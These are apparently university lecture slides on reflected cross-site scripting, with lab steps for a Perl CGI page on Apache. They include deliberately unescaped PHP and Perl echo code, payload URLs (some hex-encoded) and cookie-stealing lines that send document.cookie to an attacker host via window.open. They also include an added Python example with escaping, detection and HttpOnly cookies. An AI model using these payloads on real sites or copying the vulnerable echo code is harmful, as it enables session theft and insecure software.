Cross Site Scripting (XSS) Attack
Chien-Chung Shen, cshen@udel.edu

XSS Attack (1)
• The user visits a specially crafted link (URL) supplied by the attacker
• When the user visits the link, the crafted code gets executed by the user's browser
• Query string in the URL: ?name=value&name=value…
  – passed on to an application program at the web server
  – this is how your search request is conveyed to a search engine like Google
• For instance, index.php:
    <?php
    $name = $_GET['name'];                  // untrusted value taken straight from the URL
    echo "Welcome $name ";                  // echoed into the page without escaping
    echo '<a href="http://www.cis.udel.edu/">Click to Download</a>';
    ?>
• http://www.cis.udel.edu/~cshen/index.php?name=HelloWorld<script>alert('attacked')</script>
• When the victim loads the above URL into the browser, he will see an alert box which says 'attacked'

XSS Attack (2)
• For instance, index.php:
    <?php
    $name = $_GET['name'];
    echo "Welcome $name ";
    echo '<a href="http://www.cis.udel.edu/">Click to Download</a>';
    ?>
• The attacker can now try to change the target URL of the "Click to Download" link
• http://www.cis.udel.edu/~cshen/index.php?name=HelloWorld<script>window.onload = function() {var link=document.getElementsByTagName("a"); link[0].href="http://www.usatoday.com/";}</script>
• The function is registered on window.onload so that it runs only once the page has finished loading
• This is needed because the website (i.e., index.php) first echoes the given name and only then draws the <a> tag, so the link does not exist yet at the point where the injected script appears in the page

XSS Attack (3)
• Normally an attacker tends not to craft a URL which a human can directly read, so the attacker will encode the ASCII characters as hex, as follows:
• http://www.cis.udel.edu/~cshen/index.php?name=%48%65%6c%6c%57%6f%72%6c%64%3c%73%63%72%69%70%74%3e%77%69%6e%64%6f%77%2e%6f%6e%6c%6f%61%64%20%3d%20%66%75%6e%63%74%69%6f%6e%28%29%20%7b%76%61%72%20%6c%69%6e%6b%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%22%61%22%29%3b%6c%69%6e%6b%5b%30%5d%2e%68%72%65%66%3d%22%68%74%74%70%3a%2f%2f%61%74%74%61%63%6b%65%72%2d%73%69%74%65%2e%63%6f%6d%2f%22%3b%7d%3c%2f%73%63%72%69%70%74%3e
  (this decodes to the same window.onload script as on the previous slide, with the link target changed to http://attacker-site.com/)
• Now the victim may not know what it is, because he cannot directly see that the URL is crafted, so there is a greater chance that he will visit the URL.

Stealing Cookies via XSS Attack (1)
• Client-side XSS takes the form of the attacker getting an innocent victim to click on a carefully crafted URL to a web server
• Unknown to the victim, this URL carries a query-string portion with embedded JavaScript code that is designed to send the cookies stored in the client's browser for the web server's domain to the attacker's machine
• Convert WealthTracker.html into a CGI script named WealthTracker.cgi, a Perl executable file that spits out the HTML that is sent to the browser requesting this page
• Put WealthTracker.cgi in /usr/lib/cgi-bin
• http://<ip_of_VM>/cgi-bin/WealthTracker.cgi
• http://<IP>/cgi-bin/WealthTracker.cgi?name=<script>alert("Hello from a cookie stealer");</script>

Stealing Cookies via XSS Attack (2)
    my $forminfo = '';
    $forminfo = $ENV{QUERY_STRING};                      # raw query string handed over by the web server
    $forminfo =~ tr/+/ /;                                # '+' back to space
    $forminfo =~ s/%([a-fA-F0-9]{2,2})/chr(hex($1))/eg;  # %XX back to the character it encodes
    #$forminfo =~ s/<!--(.|\n)*-->//g;                   # (disabled) would strip HTML comments
    print "$forminfo";                                   # echoed verbatim, no escaping
• Echo back to the browser the query string, if one is found attached to the URL received from the browser
• http://<IP>/cgi-bin/WealthTracker.cgi?name=<script>alert(document.cookie);</script>
• Query string: name=<script>alert(document.cookie);</script>
• This query string would be echoed back by the server to the browser, and the browser would ordinarily process the JavaScript in the value of the string
  – Displays the cookie(s) in the browser

Stealing Cookies via XSS Attack (3)
• An evil attacker lures victims with the following URL:
  http://<IP>/cgi-bin/WealthTracker.cgi?name=<script>window.open("http://<evil_VM>/cgi-bin/collect.cgi?cookie="%2Bdocument.cookie)</script>
• The attacker has a web server running on the machine www.cis.udel.edu, and its cgi-bin includes a script called collect.cgi that simply collects the information sent to <evil_VM> by the browser on the victim machine, because of the JavaScript code in the query-string portion of the URL. Now the attacker is able to harvest the cookies in the victim's browser for the WealthTracker.cgi web site.

Stealing Cookies via XSS Attack (4)
    my $forminfo = '';
    $forminfo = $ENV{QUERY_STRING};                      # raw query string handed over by the web server
    $forminfo =~ tr/+/ /;                                # '+' back to space
    $forminfo =~ s/%([a-fA-F0-9]{2,2})/chr(hex($1))/eg;  # %XX back to the character it encodes
    #$forminfo =~ s/<!--(.|\n)*-->//g;                   # (disabled) would strip HTML comments
    print "$forminfo";                                   # echoed verbatim, no escaping
• Echo back to the browser the query string, if one is found attached to the URL received from the browser
• A clueless client has engaged in a session with this web page
• Assume that the same client has received a very authentic-looking email that lures him/her into clicking on a link that points to one of the following URLs:
  1. http://<IP>/cgi-bin/WealthTracker.cgi?name=<script>alert(document.cookie);</script>
  2. http://<IP>/cgi-bin/WealthTracker.cgi?name=<script>alert("Hello from a cookie stealer");</script>
  3. http://<IP>/cgi-bin/WealthTracker.cgi?name=<script>window.open("http://www.cis.udel.edu/cgi-bin/collect.cgi?cookie="+document.cookie)</script>
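The index.php echo from the XSS Attack slides, the Perl CGI's query-string decoding, and the cookie-theft risk from the Stealing Cookies slides, worked through as an added Python example (not code from the slides): it shows the vulnerable echo beside the escaped one, flags the hex-encoded payload after decoding it the way the CGI does, and issues the session cookie with HttpOnly so that document.cookie cannot read it. The query strings, link and function names are constructed for this example.

```python
import html
import re
from urllib.parse import parse_qs

# Constructed query strings modelled on the slides: the readable payload, and the
# same payload percent-encoded so that a human cannot read it at a glance.
PLAIN_QS = "name=HelloWorld<script>alert(document.cookie)</script>"
HEX_QS = ("name=HelloWorld%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%64%6f"
          "%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%29%3c%2f%73%63%72%69%70%74%3e")
DOWNLOAD_LINK = '<a href="http://www.cis.udel.edu/">Click to Download</a>'

def perl_style_decode(query_string: str) -> str:
    """What the slide's Perl CGI does to QUERY_STRING: '+' -> ' ', then %XX -> chr."""
    query_string = query_string.replace("+", " ")
    return re.sub(r"%([a-fA-F0-9]{2})",
                  lambda m: chr(int(m.group(1), 16)), query_string)

def get_name(query_string: str) -> str:
    """Equivalent of PHP's $_GET['name']: split the fields first, then decode each."""
    return parse_qs(query_string).get("name", [""])[0]

def render_vulnerable(query_string: str) -> str:
    """index.php as shown on the slides: the name is echoed verbatim, so a
    <script> in it becomes part of the page and runs in the victim's browser."""
    return f"Welcome {get_name(query_string)} {DOWNLOAD_LINK}"

def render_hardened(query_string: str) -> str:
    """Same page with the fix: HTML-escape untrusted input before echoing it.
    html.escape turns < > & " ' into entities, so the browser shows the payload
    as text instead of parsing it as markup (PHP: htmlspecialchars with ENT_QUOTES)."""
    return f"Welcome {html.escape(get_name(query_string), quote=True)} {DOWNLOAD_LINK}"

def looks_like_script_injection(query_string: str) -> bool:
    """Server-side log check: decode the way the CGI does, then look for a script
    tag, so the percent-encoded form is caught as well as the plain one."""
    decoded = perl_style_decode(query_string).lower()
    return re.search(r"<\s*/?\s*script\b|javascript:", decoded) is not None

def session_cookie_header(session_id: str) -> str:
    """Issue the session cookie with HttpOnly so that injected JavaScript cannot
    read it through document.cookie; Secure and SameSite limit where it is sent."""
    return f"Set-Cookie: session={session_id}; HttpOnly; Secure; SameSite=Lax"

if __name__ == "__main__":
    for qs in (PLAIN_QS, HEX_QS):
        print("vulnerable:", render_vulnerable(qs))
        print("hardened:  ", render_hardened(qs))
```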

CGI in Apache 2 (1)
Add the following directives into the file /etc/apache2/sites-enabled/000-default:
    ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
    <Directory "/usr/lib/cgi-bin">
        AllowOverride None
        Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
        Order allow,deny
        Allow from all
    </Directory>

CGI in Apache 2 (2)
To test CGI, put the following hello.cgi inside /usr/lib/cgi-bin/:
    #!/usr/bin/perl
    print "Content-type: text/html\r\n\r\n";   # header block must end with a blank line
    print '<html>';
    print '<head>';
    print '<title>Hello World - First CGI Program</title>';
    print '</head>';
    print '<body>';
    print '<h2>Hello World! This is my first CGI program</h2>';
    print '</body>';
    print '</html>';
Then do
    sudo chown root:root hello.cgi
    sudo chmod 755 hello.cgi
Open Firefox on your VM and enter localhost/cgi-bin/hello.cgi. It shows "Hello World! This is my first CGI program".